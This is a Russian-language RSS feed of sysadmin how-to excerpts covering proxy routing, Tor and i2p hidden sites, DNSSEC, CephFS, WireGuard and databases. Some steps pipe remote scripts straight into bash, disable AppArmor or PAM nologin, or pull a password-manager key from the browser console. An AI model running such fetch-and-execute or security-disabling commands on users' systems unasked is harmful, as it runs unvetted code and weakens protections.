<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>fruworg</title><link>https://fruw.supa.dog/</link><description>Recent content on fruworg</description><generator>Hugo -- gohugo.io</generator><language>ru-RU</language><lastBuildDate>Wed, 02 Jul 2025 12:48:00 +0200</lastBuildDate><atom:link href="https://fruw.supa.dog/index.xml" rel="self" type="application/rss+xml"/><item><title>Marzban - продвинутый роутинг</title><link>https://fruw.supa.dog/posts/rknb-marzban-routing/</link><pubDate>Wed, 02 Jul 2025 12:48:00 +0200</pubDate><guid>https://fruw.supa.dog/posts/rknb-marzban-routing/</guid><description>Вступление Для конфигурации нам необходимо два сервера - один будет в России, а второй за её пределами.
Российский сервер будет точкой входа и проксировать траффик через себя до российских сервисов.
До сервисов вне России сервер будет дополнительно проксировать через сервер вне России.
Домен для сервера в России, например - example.com, для сервера вне России - exit.example.com.
Установка Marzban (аналогично для двух серверов) Нужно создать папки tls и lib:
mkdir tls mkdir lib Необходимо переместить TLS ключ и сертификат в папку tls.</description></item><item><title>Поднятие сайта в i2p</title><link>https://fruw.supa.dog/posts/rknb-i2p-website/</link><pubDate>Wed, 25 Jun 2025 14:10:00 +0200</pubDate><guid>https://fruw.supa.dog/posts/rknb-i2p-website/</guid><description>Установка i2pd apt -y install -y apt-transport-https wget -qO - https://repo.i2pd.xyz/.help/add_repo | bash -s - apt update apt -y install i2pd Конфигурация i2pd В /etc/i2pd/tunnels.conf.d/website.conf необходимо добавить следующее:
[website] type = http host = 127.0.0.1 port = 80 keys = website.dat И перезагрузите i2pd:
systemctl restart i2pd Регистрация адреса В reg.i2p необходимо проверить незанятость желаемого fqdn.
Если fqdn занят, но не используется, то его тоже можно занять.
Для регистрации необходимо сгенерировать подпись:</description></item><item><title>Поднятие сайта в TOR</title><link>https://fruw.supa.dog/posts/rknb-tor-website/</link><pubDate>Wed, 25 Jun 2025 14:02:00 +0200</pubDate><guid>https://fruw.supa.dog/posts/rknb-tor-website/</guid><description>Генерация vanity адреса docker run -it nwtgck/mkp224o mkp224o &amp;lt;domain-start-with&amp;gt; -s Формула для вычисления ожидаемого времени генерации:
32^&amp;lt;number-of-characters&amp;gt;/&amp;lt;calc/sec&amp;gt; = &amp;lt;eta-in-seconds&amp;gt; Установка и конфигурация TOR Установка TOR:
apt -y install tor Следующие строки необходимо добавить в /etc/tor/torrc:
HiddenServiceDir /var/lib/tor/website HiddenServicePort 80 127.0.0.1:80 Файлы, сгенерированные mkp224o, необходимо добавить в директорию /var/lib/tor/website:
mkdir /var/lib/tor/website mv &amp;lt;domain&amp;gt;.onion/* /var/lib/tor/website chown -R debian-tor: /var/lib/tor/website chmod -R 700 /var/lib/tor/website Конфигурация Caddy В Caddyfile необходимо добавить следующее:
&amp;lt;cleanet-doma.in&amp;gt; { header Onion-Location http://&amp;lt;domain&amp;gt;.</description></item><item><title>Конфигурация DNSSEC</title><link>https://fruw.supa.dog/posts/dnssec-coredns/</link><pubDate>Wed, 25 Jun 2025 13:36:00 +0200</pubDate><guid>https://fruw.supa.dog/posts/dnssec-coredns/</guid><description>Генерация ключа dnssec-keygen -a ECDSAP256SHA256 &amp;lt;doma.in&amp;gt; Конфигурация CoreDNS В Corefile доменной зоны необходимо вставить следующее:
dnssec { key file /etc/coredns/dnssec/&amp;lt;filename-without-extension&amp;gt; } И перезапустить CoreDNS командой:
systemctl restart coredns DS-запись Далее необходимо добавить DS-запись в консоль регистратора.
Запись можно получить выполнив следующую команду:
dnssec-dsfromkey &amp;lt;filename-without-extension&amp;gt;</description></item><item><title>Создание CephFS</title><link>https://fruw.supa.dog/posts/cephfs/</link><pubDate>Fri, 30 May 2025 15:35:00 +0200</pubDate><guid>https://fruw.supa.dog/posts/cephfs/</guid><description>Создание FS / Сервер Создание пула данных и меты ceph osd pool create &amp;lt;fs-name&amp;gt;_data ceph osd pool create &amp;lt;fs-name&amp;gt;_meta ceph osd pool set &amp;lt;fs-name&amp;gt;_data bulk true Создание FS ceph fs new &amp;lt;fs-name&amp;gt; &amp;lt;fs-name&amp;gt;_meta &amp;lt;fs-name&amp;gt;_data Создание пользователя r - чтение
w - запсись
s - снапшоты
p - аттрибуты
ceph fs authorize &amp;lt;fs-name&amp;gt; client.&amp;lt;user&amp;gt; / rwsp Подключение FS / Клиент Установка необходимых пакетов apt install ceph-common attr Создание директории для монтирования FS mkdir /mnt/cephfs-&amp;lt;fs-name&amp;gt; Конфиг файлы Файл /etc/ceph/ceph.</description></item><item><title>Активация и автоматические обновления в RHEL 9</title><link>https://fruw.supa.dog/posts/rhel-setup/</link><pubDate>Thu, 27 Feb 2025 23:10:00 +0100</pubDate><guid>https://fruw.supa.dog/posts/rhel-setup/</guid><description>Активация subscription-manager register --auto-attach insights-client --register Автоматическая установка обновлений yum -y install dnf-automatic systemctl enable --now dnf-automatic-install.timer Установка расширенного репозитория subscription-manager repos --enable codeready-builder-for-rhel-9-$(arch)-rpms yum -y install https://dl.fedoraproject.org/pub/epel/epel-release-latest-9.noarch.rpm Отключение дампов ядра systemctl disable --now kdump grubby --update-kernel=ALL --remove-args=&amp;#34;crashkernel&amp;#34; init 6</description></item><item><title>Полезные бинды клавиш в Windows</title><link>https://fruw.supa.dog/posts/autohotkey/</link><pubDate>Tue, 14 Jan 2025 11:36:00 +0100</pubDate><guid>https://fruw.supa.dog/posts/autohotkey/</guid><description>Вступление Для бинда клавиш я использую AutoHotkey. Для автозапуска нужно перенести .ahk файлы в shell:startup.
CapLang.ahk Смена раскладки по нажатию на CapsLock. Сам CapsLock переключается через Shift+CapsLock.
SendMode(&amp;#34;Input&amp;#34;) SetWorkingDir A_ScriptDir +CapsLock::SetCapsLockState !GetKeyState(&amp;#34;CapsLock&amp;#34;, &amp;#34;T&amp;#34;) CapsLock::Send &amp;#34;{Alt Down}{Shift Down}{Shift Up}{Alt Up}&amp;#34; Kitty.ahk Запуск Kitty по нажатию на кнопку Copilot.
SendMode(&amp;#34;Input&amp;#34;) SetWorkingDir A_ScriptDir +#f23:: Run &amp;#34;C:\Program Files\Kitty\kitty.exe -load &amp;lt;your-profile-name&amp;gt;&amp;#34; WSL.ahk Запуск WSL по нажатию на Ctrl+Alt+T
SendMode(&amp;#34;Input&amp;#34;) SetWorkingDir A_ScriptDir &amp;lt;^&amp;lt;!t::Run &amp;#39;powershell.exe -noexit -command &amp;#34;cd &amp;lt;wsl-home-dir&amp;gt;; wsl&amp;#34;&amp;#39; PrintScreen.</description></item><item><title>Создание SWAP-файла</title><link>https://fruw.supa.dog/posts/swap-create/</link><pubDate>Sun, 12 Jan 2025 22:10:00 +0100</pubDate><guid>https://fruw.supa.dog/posts/swap-create/</guid><description>Создания Размер файла подкачки
RAM &amp;lt;= 2GB, SWAP x2
RAM 2GB - 8GB, SWAP x1
RAM &amp;gt;= 8GB, SWAP &amp;gt;= 4GB
fallocate -l &amp;lt;size-in-gb&amp;gt;G /swap chmod 600 /swap mkswap /swap swapon /swap Автомонтирование В конец /etc/fstab необходимо добавить следующую строку
/swap none swap sw 0 0 И проверим корректность записи
mount -a</description></item><item><title>Памятка по PGP/GPG</title><link>https://fruw.supa.dog/posts/pgp-commands/</link><pubDate>Sun, 12 Jan 2025 22:00:00 +0100</pubDate><guid>https://fruw.supa.dog/posts/pgp-commands/</guid><description>Экспорт gpg -a --export-secret-keys &amp;gt; private.asc gpg --export-ownertrust &amp;gt; trust.txt Импорт gpg --import private.asc gpg --import public.asc gpg --import-ownertrust trust.txt Продление gpg --list-keys gpg --quick-set-expire &amp;lt;fingerprint&amp;gt; 1y &amp;#39;*&amp;#39; gpg --export &amp;lt;your@ema.il&amp;gt; | curl -T - https://keys.openpgp.org</description></item><item><title>Обновление Proxmox 7 -> Proxmox 8</title><link>https://fruw.supa.dog/posts/pve-update/</link><pubDate>Tue, 10 Dec 2024 14:05:00 +0100</pubDate><guid>https://fruw.supa.dog/posts/pve-update/</guid><description>Актуализация ОС apt -y update apt -y dist-upgrade Проверка готовности обновления pve7to8 --full Актуализация репозиториев sed -i &amp;#39;s/bullseye/bookworm/g&amp;#39; /etc/apt/sources.list sed -i &amp;#39;s/bullseye/bookworm/g&amp;#39; /etc/apt/sources.list.d/*.list Обновление ОС и PVE apt -y update apt -y dist-upgrade init 6 Дошлифовка bash -c &amp;#34;$(curl -fsSL https://raw.githubusercontent.com/community-scripts/ProxmoxVE/main/tools/pve/post-pve-install.sh)&amp;#34; Ограничение потребление RAM zfs&amp;rsquo;ом В /etc/modprobe.d/zfs.conf добавить следующую строку (2GB на 1TB):
options zfs zfs_arc_max=4294967296 Применение и перезагрузка
update-initramfs -u -k all init 6</description></item><item><title>Ресайз диска</title><link>https://fruw.supa.dog/posts/linux-disk-resize/</link><pubDate>Tue, 10 Dec 2024 13:57:00 +0100</pubDate><guid>https://fruw.supa.dog/posts/linux-disk-resize/</guid><description>Рескан дисков echo 1 | sudo tee /sys/class/block/sda/device/rescan Расширение раздела &amp;lt;disk&amp;gt; - sda &amp;lt;partition&amp;gt; - 1
growpart /dev/&amp;lt;disk&amp;gt; &amp;lt;partition&amp;gt; Увеличение ФС &amp;lt;partition&amp;gt; - sda1
resize2fs /dev/&amp;lt;partition&amp;gt; Очистка логов Если совсем нет места для выполнения команд
journalctl --vacuum-time=1d</description></item><item><title>Эмуляция ввода текста из буфера обмена</title><link>https://fruw.supa.dog/posts/typing-emulate/</link><pubDate>Thu, 24 Oct 2024 17:07:00 +0200</pubDate><guid>https://fruw.supa.dog/posts/typing-emulate/</guid><description>Установка и удаление пакетов dnf install xclip xdotool rpm --nodeps -e xdg-desktop-portal-gnome Создание исполняемого файла В файл /usr/local/bin/easyclipboard необходимо добавить следующее:
#!/bin/bash xclip -selection clipboard -out | tr \\n \\r | xdotool selectwindow windowfocus type --clearmodifiers --delay 25 --window %@ --file - Выдача прав на исполнение chmod +x /usr/local/bin/easyclipboard ShortCut Далее необходимо забиндить исполняемый файл на какой-нибудь shortcut (например, Ctrl+E) и можно пользоваться. При нажатии комбинации клавиш текст из буфера обмена вводится по-буквенно (очень помогает с vnc/crd и подобным).</description></item><item><title>Отключение AppArmor в Ubuntu 24.04</title><link>https://fruw.supa.dog/posts/ubuntu-apparmor-disable/</link><pubDate>Wed, 09 Oct 2024 10:51:00 +0200</pubDate><guid>https://fruw.supa.dog/posts/ubuntu-apparmor-disable/</guid><description>Выключение сервиса systemctl disable --now apparmor Удаление AppArmor apt remove --assume-yes --purge apparmor Перезагрузка init 6 Одной командой systemctl disable --now apparmor &amp;amp;&amp;amp; apt remove --assume-yes --purge apparmor &amp;amp;&amp;amp; init 6</description></item><item><title>Автомонтирование SSHFS</title><link>https://fruw.supa.dog/posts/sshfs-fstab/</link><pubDate>Thu, 19 Sep 2024 13:28:00 +0200</pubDate><guid>https://fruw.supa.dog/posts/sshfs-fstab/</guid><description>Установка пакета на клиенте apt -y install sshfs Добавление строки в /etc/fstab &amp;lt;user&amp;gt;@&amp;lt;server-fqdn&amp;gt;:&amp;lt;remote-dir&amp;gt; &amp;lt;local-dir&amp;gt; sshfs allow_other,reconnect 0 Проверка монтирования mount -a</description></item><item><title>Конвертация PostgreSQL в CSV</title><link>https://fruw.supa.dog/posts/psql-to-csv/</link><pubDate>Wed, 11 Sep 2024 17:24:00 +0200</pubDate><guid>https://fruw.supa.dog/posts/psql-to-csv/</guid><description>Конвертация psql -d &amp;lt;database&amp;gt; DO $$ DECLARE r RECORD; BEGIN FOR r IN (SELECT table_name FROM information_schema.tables WHERE table_schema = &amp;#39;public&amp;#39;) LOOP EXECUTE format(&amp;#39;COPY %I TO %L WITH (FORMAT CSV, HEADER)&amp;#39;, r.table_name, &amp;#39;/&amp;lt;path-to-csv&amp;gt;/&amp;#39; || r.table_name || &amp;#39;.csv&amp;#39;); END LOOP; END $$;</description></item><item><title>Виза цифрового кочевника Черногории</title><link>https://fruw.supa.dog/posts/montenegro-dn/</link><pubDate>Wed, 31 Jul 2024 09:50:00 +0200</pubDate><guid>https://fruw.supa.dog/posts/montenegro-dn/</guid><description>Введение В первый день приезда надо оплатить туристический налог в туристичке, купить местные симки в mtel или tcom. Все документы должны быть оригиналами с мокрой печатью. Документы из РФ апостилирования не требуют. Иноязычные документы должны быть с переводом судебного переводчика, я рекомендую Майю Джонович (доставляет курьером из Подгорицы, переводит с английского и русского). Подача документов происходит в МУП&amp;rsquo;е - туда нельзя в шлёпках, шортах и майке. Документы для подачи действительны 6 месяцев.</description></item><item><title>WireGuard. Установка и настройка</title><link>https://fruw.supa.dog/posts/rknb-wg/</link><pubDate>Wed, 05 Jun 2024 17:37:00 +0600</pubDate><guid>https://fruw.supa.dog/posts/rknb-wg/</guid><description>Подготовка На сервере и клиенте необходимо установить пакет wireguard и сгенерировать публичный и приватный ключи:
apt install wireguard cd /etc/wireguard wg genkey | tee privatekey | wg pubkey &amp;gt; publickey Конфигурация сервера Форвардинг пакетов В файл /etc/sysctl.conf необходимо добавить следующие строки:
net.ipv4.ip_forward=1 net.ipv6.conf.all.forwarding=1 И подгрузить эти значения командой sysctl -p
Конфигурация WireGuard В файл /etc/wireguard/&amp;lt;conn-name&amp;gt;.conf необходимо дописать следующее:
[Interface] PrivateKey = &amp;lt;private-key&amp;gt; Address = 172.0.0.1/24 PostUp = iptables -A FORWARD -i wg0 -j ACCEPT; iptables -t nat -A POSTROUTING -o &amp;lt;interface&amp;gt; -j MASQUERADE PostDown = iptables -D FORWARD -i wg0 -j ACCEPT; iptables -t nat -D POSTROUTING -o &amp;lt;interface&amp;gt; -j MASQUERADE ListenPort = 51820 [Peer] PublicKey = &amp;lt;public-key&amp;gt; AllowedIPs = 172.</description></item><item><title>Установка и конфигурация MariaDB</title><link>https://fruw.supa.dog/posts/mariadb-installation/</link><pubDate>Fri, 26 Jan 2024 16:30:00 +0600</pubDate><guid>https://fruw.supa.dog/posts/mariadb-installation/</guid><description>Установка MariaDB apt install mariadb-server Security конфигурация mysql_secure_installation Создание БД и пользователя Для того, чтобы можно было подключиться удалённо, необходимо заменить localhost на *.
mysql create database &amp;lt;database&amp;gt;; grant all privileges on &amp;lt;database&amp;gt;.* TO &amp;#39;&amp;lt;username&amp;gt;&amp;#39;@&amp;#39;localhost&amp;#39; identified by &amp;#39;&amp;lt;password&amp;gt;&amp;#39;; flush privileges; exit</description></item><item><title>Добавление WireGuard в GUI Gnome</title><link>https://fruw.supa.dog/posts/wg-gnome-gui/</link><pubDate>Sat, 16 Dec 2023 17:10:00 +0600</pubDate><guid>https://fruw.supa.dog/posts/wg-gnome-gui/</guid><description>Добавление nmcli connection import type wireguard file /etc/wireguard/&amp;lt;wg-conn-name&amp;gt;.conf</description></item><item><title>Подключение через RDG с GNU/Lunux</title><link>https://fruw.supa.dog/posts/rdg-from-linux/</link><pubDate>Mon, 16 Oct 2023 23:06:00 +0600</pubDate><guid>https://fruw.supa.dog/posts/rdg-from-linux/</guid><description>Подключение Если используешь иксы, то вместо wlfreerdp пиши xfreerdp:
wlfreerdp /gu:&amp;lt;username&amp;gt; /u:&amp;lt;username&amp;gt; /gp:&amp;lt;password&amp;gt; /p:&amp;lt;password&amp;gt; /v:&amp;lt;vm-fqdn&amp;gt; /g:&amp;lt;rdg-fqdn&amp;gt; /sound /microphone:sys:alsa,dev:hw:0,0 /f</description></item><item><title>Использование отпечатка пальца в vaultwarden</title><link>https://fruw.supa.dog/posts/touchid-vw-linux/</link><pubDate>Fri, 13 Oct 2023 03:15:00 +0600</pubDate><guid>https://fruw.supa.dog/posts/touchid-vw-linux/</guid><description>Клонирование и сборка утилиты Перед началом необходимо настроить работу сканера отпечатка пальцев.
git clone https://github.com/quexten/bw-bio-handler /tmp/bw cd /tmp/bw go mod download go mod tidy go build . Перемещение бинарника mv bw-bio-handler /usr/local/bin chown root: /usr/local/bin/bw-bio-handler Перемещение политики и проверка корректности mv biometrics/policies/com.quexten.bw-bio-handler.xml /usr/share/polkit-1/actions/ go test biometrics Получение userid и key Для полученя userid необходимо зайти в консоль браузера на странице разблокированного хранилища и выполнить следующую комманду:
console.log(await this.bitwardenContainerService.cryptoService.stateService.getActiveUserIdFromStorage()) Для key аналогично:</description></item><item><title>Конфигурация аутентификации по отпечатку пальца</title><link>https://fruw.supa.dog/posts/touchid-linux/</link><pubDate>Fri, 13 Oct 2023 02:25:00 +0600</pubDate><guid>https://fruw.supa.dog/posts/touchid-linux/</guid><description>Введение Эта статья является переводом странички из вики Debian.
Установка пакетов для функционирования сканера Список поддерживаемых устройств.
apt install fprintd libpam-fprintd Сканирование отпечатка После запуска команды надо будет несколько раз прижимать палец к сканеру.
fprintd-enroll Проверка отпечатка fprintd-verify Использование sudo с отпечатком пальца После запуска команды необходимо отметить Fingerprint Authentication и нажать Ok.
pam-auth-update</description></item><item><title>Папки на английском при русской локализации</title><link>https://fruw.supa.dog/posts/home-en-folders/</link><pubDate>Fri, 13 Oct 2023 00:44:00 +0600</pubDate><guid>https://fruw.supa.dog/posts/home-en-folders/</guid><description>Смена имени Команда создаст папки на английском языке и сделает их стандартными. Папки с названиями на русском языке можно удалить.
LANG=C xdg-user-dirs-update --force</description></item><item><title>Обновление PostgreSQL</title><link>https://fruw.supa.dog/posts/postgres-update/</link><pubDate>Mon, 09 Oct 2023 00:20:00 +0600</pubDate><guid>https://fruw.supa.dog/posts/postgres-update/</guid><description>Листинг запущенных экземпляров PostgreSQL pg_lsclusters Остановка экземпляра PostgreSQL новой версии pg_dropcluster &amp;lt;new-version&amp;gt; main --stop Миграция со старой версии на новую pg_upgradecluster &amp;lt;old-version&amp;gt; main Дроп экземпляра PostgreSQL старой версии pg_dropcluster &amp;lt;old-version&amp;gt; main Удаление пакетов старой версии PostgreSQL apt purge -y postgresql-&amp;lt;old-version&amp;gt; postgresql-client-&amp;lt;old-version&amp;gt;</description></item><item><title>Динамический whitelist в caddy</title><link>https://fruw.supa.dog/posts/envip/</link><pubDate>Sun, 01 Oct 2023 01:10:00 +0600</pubDate><guid>https://fruw.supa.dog/posts/envip/</guid><description>envip Небольшая утилита, которая позволяет реализовать динамический whitelist для caddy: Часть поддоменов будут доступны списку явно разрешённых IP. Список IP автоматически пополняется при успешном прохождении basic auth на отдельном поддомене.
Установка Caddy В Caddyfile необходимо добавить секцию с поддоменом для обновления whitelist (необходимо заменить строку basic auth):
wh.&amp;lt;your.domain&amp;gt; { @block { not client_ip {$WHITE_LIST} } handle @block { basicauth { Bob $2a$14$Zkx19XLiW6VYouLHR5NmfOFU0z2GTNmpkT/5qqR7hx4IjWJPDhjvG } reverse_proxy localhost:50009 { header_up X-Real-IP {remote_host} } } respond &amp;#34;IP bleached!</description></item><item><title>Как собрать бинарник ruby и не сойти с ума</title><link>https://fruw.supa.dog/posts/ruby-packer/</link><pubDate>Thu, 03 Aug 2023 19:00:00 +0600</pubDate><guid>https://fruw.supa.dog/posts/ruby-packer/</guid><description>Вступление Лучше всего использовать ту же версию bundler и ruby, что использует rubyc. Необходимо прописать все зависимости явно в *.gemspec. Если сборка завершается с ошибкой не найденой версией GLIBC/XCRYPT, то необходимо понизить версию rubyc/поднять версию ОС. Если же завершается успешно, но при запуске вываливается ошибка, связанная с каким-нибудь gem&amp;rsquo;ом - надо попробовать понизить/повысить его версию. У меня получилось собрать бинарник только используя Debian SID и форк Rubyc (3.1.3). Пример утилиты, которая успешно собралась.</description></item><item><title>Работа с репозиториями GitHub через терминал</title><link>https://fruw.supa.dog/posts/github-ssh-auth/</link><pubDate>Wed, 26 Jul 2023 16:29:00 +0600</pubDate><guid>https://fruw.supa.dog/posts/github-ssh-auth/</guid><description>Генерация ключа ssh-keygen -t ed25519 -C &amp;#34;&amp;lt;your&amp;gt;@&amp;lt;ema.il&amp;gt;&amp;#34; Вывод публичного ключа cat ~/.ssh/id_ed25519.pub Добавление ключа в GitHub Необходимо зайти на GitHub в настройки своего аккаунта и перейти в раздел &amp;ldquo;SSH and GPG keys&amp;rdquo;. Далее нужно нажать &amp;ldquo;New SSH key&amp;rdquo;, вставить содержимое публичного ключа и сохранить изменения.
Аутентификация в GitHub git remote set-url origin git@github.com:&amp;lt;username&amp;gt;/&amp;lt;reponame&amp;gt;.git</description></item><item><title>ldaps аутентификация в Postgres Pro</title><link>https://fruw.supa.dog/posts/postgres-ldaps/</link><pubDate>Thu, 01 Jun 2023 20:40:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/postgres-ldaps/</guid><description>Выпуск сертфиката AD необходимо дать роль CA и выпустить сертификат. Подробнее: https://youtu.be/xC3ujXGkh_c?t=160
Перенос сертификата Необходимо перенести выпущенный конечный сертификат на сервер СУБД и перекодировать следующей командой:
openssl x509 -inform der -in &amp;lt;ad&amp;gt;.cer -out &amp;lt;ad&amp;gt;.pem Установка пакета ldap-utils apt install ldap-utils -y Правка ldap конфига В файл /etc/ldap/ldap.conf необходимо добавить следующие строки:
TLS_CACERT	/etc/ldap/&amp;lt;ad&amp;gt;.pem BASE	dc=&amp;lt;domain&amp;gt;,dc=&amp;lt;local&amp;gt; URI ldaps://&amp;lt;dc&amp;gt;.&amp;lt;domain&amp;gt;.&amp;lt;local&amp;gt;:636 Проверка ldap ldapsearch -x -b &amp;#34;dc=&amp;lt;domain&amp;gt;,dc=&amp;lt;local&amp;gt;&amp;#34; -H ldaps://&amp;lt;dc&amp;gt;.&amp;lt;domain&amp;gt;.&amp;lt;local&amp;gt;:636 -W -D &amp;lt;domain-user&amp;gt; Правка pg_hba.conf С ldapprefix/ldapsuffix в файле /var/lib/pgpro/std-14/data/pg_hba.</description></item><item><title>Добавление самоподписанных сертификатов в доверенное хранилище</title><link>https://fruw.supa.dog/posts/selfsigned-to-trusted/</link><pubDate>Fri, 12 May 2023 18:20:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/selfsigned-to-trusted/</guid><description>Получение корневого сертификата echo quit | openssl s_client -showcerts -servername &amp;lt;websi.te&amp;gt; -connect &amp;lt;websi.te&amp;gt;:443 &amp;gt; &amp;lt;certificate&amp;gt;.crt Astra Linux Перемещение сертификата cp &amp;lt;certificate&amp;gt;.crt /usr/local/share/ca-certificates Обновление состава доверенного хранилища dpkg-reconfigure ca-certificates Alt Linux Перемещение сертификата cp &amp;lt;certificate&amp;gt;.crt /etc/pki/ca-trust/source/anchors/ Обновление состава доверенного хранилища update-ca-trust enable update-ca-trust extract</description></item><item><title>Автомонтирование сетевых дисков на Linux</title><link>https://fruw.supa.dog/posts/cifs-automount/</link><pubDate>Fri, 12 May 2023 18:10:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/cifs-automount/</guid><description>Установка пакета apt install cifs-utils -y Создание файла с данными УЗ В файл /root/.smbuser необходимо добавить данные УЗ для подключения к шаре:
username=&amp;lt;username&amp;gt; password=&amp;lt;password&amp;gt; domain=&amp;lt;domain&amp;gt; Смена прав на файл с данными УЗ sudo chmod 0400 /root/.smbuser Развёртывание В /etc/fstab необходимо добавить строку подключения к шаре:
//&amp;lt;address&amp;gt; /&amp;lt;folder&amp;gt; cifs credentials=/root/.smbuser,uid=&amp;lt;uid&amp;gt;,gid=&amp;lt;gid&amp;gt; 0 0 Монтирование всех директорий mount -a Монтирование ручками (необязательно) mount -t cifs //&amp;lt;address&amp;gt; /&amp;lt;folder&amp;gt; -o username=&amp;lt;username&amp;gt;,password=&amp;lt;password&amp;gt;,domain=&amp;lt;domain&amp;gt;</description></item><item><title>Установка и конфигурация ALD Pro</title><link>https://fruw.supa.dog/posts/ald-pro/</link><pubDate>Mon, 08 May 2023 23:25:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/ald-pro/</guid><description>Создания сетевой видимости В файл /etc/hosts необходимо добавить ip и fqdn DC:
&amp;lt;dc-ip&amp;gt; &amp;lt;dc-name&amp;gt;.&amp;lt;domain&amp;gt; &amp;lt;dc-name&amp;gt; Смена хостнейма hostnamectl set-hostname &amp;lt;dc-name&amp;gt;.&amp;lt;domain&amp;gt; Добавление репозиториев ALD Pro В файл /etc/apt/sources.list.d/aldpro.list необходимо добавить репозиторий ALD Pro:
deb https://download.astralinux.ru/aldpro/stable/repository-main/ 1.0.0 main deb https://download.astralinux.ru/aldpro/stable/repository-extended/ generic main Выставление приоритета репозиториев В файле /etc/apt/preferences.d/aldpro необходимо выставить приоритет репозиториев:
Package: * Pin: release n=generic Pin-Priority: 900 Установка пакета DEBIAN_FRONTEND=noninteractive apt-get install -q -y aldpro-mp Развёртывание После того, как команда развёртывания отработает и сервер перезагрузитcя, сервер ALD Pro будет доступен по адресу: https://&amp;lt;dc-name&amp;gt;.</description></item><item><title>Конвертация .pfx в .pem</title><link>https://fruw.supa.dog/posts/pfx-to-pem/</link><pubDate>Wed, 12 Apr 2023 11:45:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/pfx-to-pem/</guid><description>Извлечение сертификата и ключа openssl pkcs12 -in &amp;lt;tls&amp;gt;.pfx -out &amp;lt;tls&amp;gt;.pem -nodes Извлечение сертификата openssl pkcs12 -in &amp;lt;tls&amp;gt;.pfx -clcerts -nokeys -out &amp;lt;cert&amp;gt;.pem Извлечение ключа openssl pkcs12 -in &amp;lt;tls&amp;gt;.pfx -nocerts -out &amp;lt;key&amp;gt;.tmp.key Обеспароливание ключа openssl rsa -in &amp;lt;key&amp;gt;.tmp.key -out &amp;lt;key&amp;gt;.key</description></item><item><title>Принудительное отключение создания файла nologin</title><link>https://fruw.supa.dog/posts/run-nologin/</link><pubDate>Thu, 06 Apr 2023 18:25:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/run-nologin/</guid><description>Комментим строку В найденых файлах необходимо закомментить все строки с pam_nologin.so.
cd /etc/pam.d nano $(grep -Rl &amp;#34;pam_nologin.so&amp;#34;) Перезагружаем машину init 6</description></item><item><title>Отключение возможности выключения/перезагрузки/сна на Windows</title><link>https://fruw.supa.dog/posts/windows-disable-shutdown/</link><pubDate>Thu, 06 Apr 2023 12:15:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/windows-disable-shutdown/</guid><description>Отключение В ветке реестра выставить значение value на 1.
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep</description></item><item><title>Принудительная запись в resolv.conf</title><link>https://fruw.supa.dog/posts/dhcp-resolv/</link><pubDate>Thu, 06 Apr 2023 02:43:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/dhcp-resolv/</guid><description>Конфигурация клиента Неприятно, когда конфиг не даёт поменять себя ручками, да? В /etc/dhcp/dhclient.conf необходимо добавить строки перезаписи:
supersede domain-name-servers &amp;lt;dns-1&amp;gt;, &amp;lt;dns-n&amp;gt;; supersede domain-name &amp;#34;&amp;lt;domain.local&amp;gt;&amp;#34;; systemctl restart networking</description></item><item><title>Установка fly-dm (GUI) на Astra Linux</title><link>https://fruw.supa.dog/posts/astra-fly/</link><pubDate>Tue, 04 Apr 2023 12:35:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/astra-fly/</guid><description>Установка пакета fly apt install fly-all-main Загрузка ОС с GUI по-умолчанию systemctl set-default graphical.target Примечание Посмотреть текущую конфигурацию загрузки systemctl get-default Вернуть загрузку ОС с CLI systemctl set-default multi-user.target</description></item><item><title>Установка и конфигурация FreeIPA на Astra Linux</title><link>https://fruw.supa.dog/posts/astra-freeipa/</link><pubDate>Sat, 25 Mar 2023 01:08:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/astra-freeipa/</guid><description>Общая настройка Создания сетевой видимости На клиенте и DC необходимо в файл /etc/hosts добавить оба ip и fqdn:
&amp;lt;server-ip&amp;gt; &amp;lt;server-name&amp;gt;.&amp;lt;domain&amp;gt; &amp;lt;server-name&amp;gt; &amp;lt;client-ip&amp;gt; &amp;lt;client-name&amp;gt;.&amp;lt;domain&amp;gt; &amp;lt;client-name&amp;gt; Настройка cервера Смена хостнейма hostnamectl set-hostname &amp;lt;server-name&amp;gt;.&amp;lt;domain&amp;gt; Установка пакета apt install fly-admin-freeipa-server -y Развёртывание astra-freeipa-server -d &amp;lt;domain&amp;gt; -n &amp;lt;server-name&amp;gt; -px -ip &amp;lt;server-ip&amp;gt; -o --dogtag -y Настройка клиента Смена хостнейма hostnamectl set-hostname &amp;lt;client-name&amp;gt;.&amp;lt;domain&amp;gt; Установка пакета apt install fly-admin-freeipa-client -y -px &amp;#34;--force&amp;#34; Конфигурация клиента astra-freeipa-client -d &amp;lt;domain&amp;gt;</description></item><item><title>Дроп БД форсированно в Postgres</title><link>https://fruw.supa.dog/posts/postgres-drop-db/</link><pubDate>Fri, 03 Mar 2023 13:26:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/postgres-drop-db/</guid><description>На старой версии (&amp;lt;=12) Заходим в консоль Postgres:
psql Убиваем соединения с БД:
SELECT	pg_terminate_backend (pid) FROM	pg_stat_activity WHERE	pg_stat_activity.datname = &amp;#39;&amp;lt;database_name&amp;gt;&amp;#39;; Дропаем БД:
DROP DATABASE &amp;lt;database_name&amp;gt;; На новой версии (&amp;gt;=13) Заходим в консоль Postgres:
psql Дропаем БД:
